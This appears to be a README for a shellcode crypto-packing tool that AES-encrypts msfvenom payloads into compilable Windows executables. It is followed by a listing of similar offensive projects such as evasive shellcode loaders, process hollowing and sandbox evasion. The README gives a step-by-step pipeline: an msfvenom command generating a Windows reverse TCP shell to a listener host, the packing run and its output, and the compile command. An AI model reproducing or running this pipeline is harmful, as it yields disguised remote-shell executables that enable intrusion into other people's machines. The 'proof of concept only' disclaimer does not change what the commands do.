A shellcode crypto-packing tool for PoC (used with msfvenom payloads)

crypter

A shellcode crypto-packing tool for PoC (used with msfvenom/binary payloads)

This tool is for proof of concept only - please use responsibly.

Crypter is an auxiliary tool used for crypto packing msfvenom Windows payloads. It uses AES128 (optimal for speed) to encrypt the payload and create C source from it from which you can compile (on linux or windows) into an executable.

You will need to install MinGW on Linux in order to compile .exe files:

$ apt-get update
$ apt-get install mingw-w64

#Install

First, you will need to install the dependency/dependencies that crypter relies on (mainly OpenSSL):

$ apt-get install libssl-dev

Then, download this repository and install:

$ git clone https://github.com/ripmeep/crypter/ && cd crypter
$ gcc crypter.c -o crypter -lcrypto -I src/

#Usage

You will need to generate/already have a file that contains raw shellcode that you wish to execute in an exe file. Metasploit is a good way of generating one for reverse shells/exploits. (https://github.com/rapid7/metasploit-framework/)

Generate a payload:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LISTENER IP] LPORT=[LISTENER PORT] -f raw -o payload.bin

Run crypter to crypto pack the shellcode into a C source binary:

$ ./crypter payload.bin shell.exe

Extracted contents of payload.dat
Generated random AES256 Cryto Pack key: 924C2038A4B0DEFDF8420A2A896688CE900DD26109759A4CAE0681A147A64FA5
Generated random initialization vector: 34A7B03E8F2CD3023ED2BF78ECC8AE846D84B30F96E97BC02189820276DEB229
Successfully encrypted payload - generating exe file

Generated Crypto C source
Writing source to shell.exe.c...
Done
Now run: x86_64-w64-mingw32-gcc shell.exe.c -o shell.exe -fno-stack-protector
Finished

It will then display the MinGW command you need to run to compile the source file. x86_64-w64-mingw32-gcc shell.exe.c -o shell.exe -fno-stack-protector (my case).

Similar Resources

Multiple payloads for the digispark digistump AVR boards.

Multiple payloads for the digispark digistump AVR boards. Some are translated from RubberDucky and some are original..

Dec 14, 2022

Volatile ELF payloads generator with Metasploit integrations for testing GNU/Linux ecosystems against low-level threats

Volatile ELF payloads generator with Metasploit integrations for testing GNU/Linux ecosystems against low-level threats

Revenant Intro This tool combines SCC runtime, rofi, Msfvenom, Ngrok and a dynamic template processor, offering an easy to use interface for compiling

Aug 23, 2022

Hydrogen is a tiny GDI Malware, with some bytebeat music, many payloads and some shaders

Hydrogen is a tiny GDI Malware, with some bytebeat music, many payloads and some shaders

Hydrogen is a tiny GDI Malware, with some bytebeat music, many payloads and some shaders

Nov 12, 2022

x86 Assembler used for generating shellcode

Intel x86 assembler [email protected] syntax: Decimal “integers begin with a non-zero digit followed by zero or more decimal digits (0–9)” B

Dec 28, 2022

A Simple tool to execute shellcode with the ability to detect mouse movement

A Simple tool to execute shellcode with the ability to detect mouse movement

Noobi A Simple tool to execute shellcode with the ability to detect mouse movement Features: Sandbox evasion through detecting mouse movement and chec

Nov 9, 2022

A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

Jektor Toolkit v1.0 This utility focuses on shellcode injection techniques to demonstrate methods that malware may use to execute shellcode on a victi

Sep 5, 2022

PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.

PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.

PetitPotam PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions :) The tools use the

Jan 4, 2023

The pico can be used to program other devices. Raspberry pi made such an effort. However there is no board yet, that is open-source and can be used with OpenOCD as a general-purpose programmer

The pico can be used to program other devices. Raspberry pi made such an effort. However there is no board yet, that is open-source and can be used with OpenOCD as a general-purpose programmer

pico-probe-programmer The pico can be used to program other devices. Raspberry pi made such an effort. However there is no board yet, that is open-sou

Oct 15, 2022
POC tool to convert CobaltStrike BOF files to raw shellcode

BOF2Shellcode POC tool to convert a Cobalt Strike BOF into raw shellcode. Introduction This code was written as part of a blog tutorial on how to conv

Dec 30, 2022
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.

This repository contains a personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to

Dec 28, 2022
React Native polyfill for crypto.getRandomValues. Used in libraries like uuid.

react-native-random-values-jsi-helper React Native polyfill for crypto.getRandomValues. Used in libraries like uuid. Installation yarn add react-nativ

Oct 30, 2022
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

Dec 20, 2022
Evasive shellcode loader for bypassing event-based injection detection (PoC)
Evasive shellcode loader for bypassing event-based injection detection (PoC)

(cleaned up version here: https://github.com/xinbailu/DripLoader-Ops) DripLoader (PoC) Evasive shellcode loader for bypassing event-based injection de

Dec 28, 2022
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.

Thread Stack Spoofing PoC A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to byp

Jan 9, 2023
Evasive shellcode loader for bypassing event-based injection detection (PoC)
Evasive shellcode loader for bypassing event-based injection detection (PoC)

DripLoader (PoC) Evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection. The project

Dec 28, 2022
Modo Kit that includes a command for packing UVs, powered by UVPackmaster 2

uvpackit Modo Kit that includes a command for packing UVs, powered by UVPackmaster 2 The included command can be executed with uvp.pack which will ope

Sep 10, 2022
Linux x86_64 Process Injection Utility | Manipulate Processes With Customized Payloads (beta)
Linux x86_64 Process Injection Utility | Manipulate Processes With Customized Payloads (beta)

K55 - Linux x86_64 Process Injection Utility (C++11) About K55 (pronounced: "kay fifty-five") The K55 payload injection tool is used for injecting x86

Sep 5, 2022
A library to develop kernel level Windows payloads for post HVCI era
A library to develop kernel level Windows payloads for post HVCI era

A library to develop kernel level Windows payloads for post HVCI era

Dec 15, 2022